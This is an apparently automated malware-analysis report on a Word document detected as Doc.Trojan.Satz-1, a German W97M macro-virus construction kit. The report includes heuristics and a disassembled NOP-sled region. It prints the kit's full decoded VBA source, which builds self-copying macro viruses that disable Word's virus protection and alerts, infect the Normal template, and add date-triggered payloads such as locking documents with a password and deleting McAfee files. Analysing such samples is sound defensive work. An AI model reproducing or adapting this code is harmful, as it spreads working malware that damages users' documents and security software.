Verdict: MALICIOUS
Risk Score: 208
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Word document containing a legacy WordBasic auto-exec macro named 'autoopen'. The VBA code within 'macros.bas' also defines an 'autoopen' subroutine that attempts to minimize the application and show a userform named 'prog'. The script also contains obfuscated code that appears to be part of a macro virus kit, attempting to disable security features and potentially download additional content. The presence of the 'autoopen' macro and the nature of the VBA code strongly suggest a malicious intent to execute further stages.
Heuristics (5)
- ClamAV: Doc.Trojan.Satz-1 (critical) [CLAMAV_DETECTION] ClamAV detected this file as malware: Doc.Trojan.Satz-1
- NOP sled detected (high) [SC_NOP_SLED] Found 20+ consecutive 0x90 bytes
Disassembly (attempted x86 opcode disassembly of the flagged region):
00029405 90 nop
00029406 90 nop
00029407 90 nop
00029408 90 nop
00029409 90 nop
0002940A 90 nop
0002940B 90 nop
0002940C 90 nop
0002940D 90 nop
0002940E 90 nop
0002940F 90 nop
00029410 90 nop
00029411 90 nop
00029412 90 nop
00029413 90 nop
00029414 90 nop
00029415 90 nop
00029416 90 nop
00029417 90 nop
00029418 90 nop
00029419 90 nop
0002941A 90 nop
0002941B 90 nop
0002941C 90 nop
0002941D 90 nop
0002941E 90 nop
0002941F 90 nop
00029420 9f lahf
00029421 9f lahf
00029422 9f lahf
00029423 9f lahf
00029424 9f lahf
00029425 9f lahf
00029426 a0a0a0a0a0 mov al, byte ptr [0xa0a0a0a0]
0002942B a0a0a0a0a0 mov al, byte ptr [0xa0a0a0a0]
00029430 a0a0afafaf mov al, byte ptr [0xafafafa0]
00029435 af scasd eax, dword ptr es:[edi]
00029436 af scasd eax, dword ptr es:[edi]
00029437 af scasd eax, dword ptr es:[edi]
00029438 b0b0 mov al, 0xb0
0002943A b0af mov al, 0xaf
0002943C af scasd eax, dword ptr es:[edi]
0002943D af scasd eax, dword ptr es:[edi]
0002943E 9f lahf
0002943F 9f lahf
00029440 9f lahf
00029441 af scasd eax, dword ptr es:[edi]
00029442 af scasd eax, dword ptr es:[edi]
00029443 af scasd eax, dword ptr es:[edi]
00029444 9f lahf
00029445 9f lahf
00029446 9f lahf
00029447 90 nop
00029448 90 nop
00029449 90 nop
0002944A 7f7f jg 0x294cb
0002944C 7fcf jg 0x2941d
0002944E cf iretd
0002944F cf iretd
00029450 df .byte 0xdf
00029451 df .byte 0xdf
00029452 dfe0 fnstsw ax
00029454 ef out dx, eax
00029455 ef out dx, eax
00029456 ef out dx, eax
00029457 f0 .byte 0xf0
00029458 f0 .byte 0xf0
00029459 f0 .byte 0xf0
0002945A ff .byte 0xff
0002945B ff .byte 0xff
0002945C ef out dx, eax
0002945D ef out dx, eax
0002945E ef out dx, eax
0002945F ff .byte 0xff
00029460 ff .byte 0xff
00029461 fff0 push eax
00029463 f0 .byte 0xf0
00029464 f0 .byte 0xf0
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC] OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected (medium, 1 related finding) [OLE_VBA_MACROS] Document contains VBA macro code
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN] AutoOpen macro. Matched lines in script:
  Attribute VB_Name = "VirusBausatz"
  Sub autoopen()
  Application.WindowState = wdWindowStateMinimize
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6678 bytes |

SHA-256: 9643f3bc74c4dcf8fb58f5bfbe6b40b19ce8ddb3d0fa62305d0ef37c53ca7e3c
Detection (ClamAV): Doc.Trojan.Satz-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VirusBausatz"
Sub autoopen()
Application.WindowState = wdWindowStateMinimize
prog.Show
End Sub
Attribute VB_Name = "prog"
Attribute VB_Base = "0{BA2AE9D2-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C3-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub boxzeigen_Click()
End Sub
Private Sub CheckBox3_Click()
End Sub
Private Sub CommandButton1_Click()
Hilfe.Show
End Sub
Private Sub create_Click()
Documents.Add
Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule
ende = "end if"
anzeichen = "'"
offnen = "sub autoopen()"
schliessen = "sub autoexit()"
speichern = "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument"
vcode = "on error resume next" & Chr(10) _
& "'Made with the W97 MakroVirus Bausatz by MagBee" & Chr(10) & "ActiveDocument.ReadOnlyRecommended = False" & Chr(10) & "Options.VirusProtection = False" & Chr(10) _
& "Options.SaveNormalPrompt = False" & Chr(10) & "Application.DisplayAlerts = wdAlertsNone" & Chr(10) & "Application.EnableCancelKey = wdCancelDisabled" & Chr(10) _
& "Application.DisplayStatusBar = False" & Chr(10) & "Options.ConfirmConversions = False" & Chr(10) & "Application.ScreenUpdating = False" & Chr(10) & "If ThisDocument.Name =" & Chr$(34) & "Normal.dot" & Chr$(34) & "Then" & Chr(10) _
& "Set Source = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "else" & Chr(10) & "Set Source = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& Chr(10) & "Set Target = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "End If" & Chr(10) & "With Source" & Chr(10) & "vircode = .lines(1, .countoflines)" _
& Chr(10) & "End With" & Chr(10) & "With Target" & Chr(10) & ".deletelines 1, .countoflines" _
& Chr(10) & ".insertlines 1, vircode" & Chr(10) & "End With" & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & "end sub" _
If OptionButton1.Value = True Then
With Target
.insertlines 1, offnen
End With
End If
If OptionButton2.Value = True Then
With Target
.insertlines 1, schliessen
End With
End If
With Target
.insertlines 2, vcode
End With
With Target
.insertlines 42, speichern
End With
If boxzeigen.Value = True Then
nachricht = InputBox("Gebt hier die Nachricht ein, die in der Messagebox stehen soll", "Nachricht in der Messagebox")
trigger = "if day(now()) = " & Label1 & " and month(now()) = " & Label3 & " then"
mbox = "Msgbox " & Chr$(34) & nachricht & Chr$(34) & ", ," & Chr$(34) & "W97M Virus Bausatz by MagBee" & Chr$(34)
If CheckBox3.Value = True Then
With Target
.insertlines 31, mbox
End With
GoTo weiterpw
End If
With Target
.insertlines 30, trigger
.insertlines 31, mbox
.insertlines 32, ende
End With
End If
weiterpw:
If passwort.Value = True Then
pawo = InputBox("Wie soll das Passwort lauten (keine Leerzeichen)", "Passwortvergabe")
triggerpw = "if day(now()) = " & Label4 & " and month(now()) = " & Label6 & " then"
pw = "If ActiveDocument.HasPassword = False Then ActiveDocument.Password = " & Chr$(34) & pawo & Chr$(34)
If CheckBox6.Value = True Then
With Target
.insertlines 35, pw
End With
GoTo weiterers
End If
With Target
.insertlines 34, triggerpw
.insertlines 35, pw
.insertlines 36, ende
End With
End If
weiterers:
If CheckBox2.Value = True Then
wzuersetz = InputBox("Welches Wort soll ersetzt werden", "Wort ersetzen")
ersetzwort = InputBox("Durch welches Wort soll es ersetzt werden", "Wort ersetzen")
ersetzen = "Selection.Find.ClearFormatting" & Chr(10) & "Selection.Find.Replacement.ClearFormatting" _
& Chr(10) & "With Selection.Find" & Chr(10) & ".Text = " & Chr$(34) & wzuersetz & Chr$(34) & Chr(10) & ".Replacement.Text = " _
& Chr$(34) & ersetzwort & Chr$(34) & Chr(10) & ".Forward = True" & Chr(10) & ".Wrap = wdFindContinue" & Chr(10) & "End With" _
& Chr(10) & "Selection.Find.Execute Replace:=wdReplaceAll"
triggerers = "if day(now()) = " & Label5 & " and month(now()) = " & Label9 & " then"
If CheckBox7.Value = True Then
With Target
.insertlines 39, ersetzen
End With
GoTo weiter
End If
With Target
.insertlines 38, triggerers
.insertlines 39, ersetzen
.insertlines 40, ende
End With
End If
weiter:
If OptionButton3.Value = True Then
killja = "Kill (" & Chr$(34) & "c:\Programme\Mcafee\VirusScan\*.*" & Chr$(34) & ")"
With Target
.insertlines 28, killja
End With
End If
vname = InputBox("Wie soll der Virus heißen ?", "creation", "VirusName")
ActiveDocument.SaveAs FileName:=vname, FileFormat:=wdFormatDocument
MsgBox "Dein Virus wurde unter Eigene Dateien gespeichert", , "W97M Bausatz by MagBee" & Chr$(34)
End Sub
Private Sub payload_Click()
End Sub
Private Sub OptionButton1_Click()
End Sub
Private Sub OptionButton2_Click()
MsgBox "Wichtig bei Autoexit zuerst den Virus schließen (Aktives Fenster in Word)" & Chr(10) & "und dann Word beenden !", , "W97M Virus Bausatz by MagBee"
End Sub
Private Sub OptionButton4_Click()
End Sub
Private Sub passwort_Click()
End Sub
Private Sub ScrollBar1_Change()
Label1.Caption = ScrollBar1.Value
End Sub
Private Sub ScrollBar2_Change()
Label3.Caption = ScrollBar2.Value
End Sub
Private Sub ScrollBar3_Change()
Label4.Caption = ScrollBar3.Value
End Sub
Private Sub ScrollBar4_Change()
Label5.Caption = ScrollBar4.Value
End Sub
Private Sub ScrollBar5_Change()
Label6.Caption = ScrollBar5.Value
End Sub
Private Sub ScrollBar6_Change()
Label9.Caption = ScrollBar6.Value
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "Hilfe"
Attribute VB_Base = "0{BA2AE9CE-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C5-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub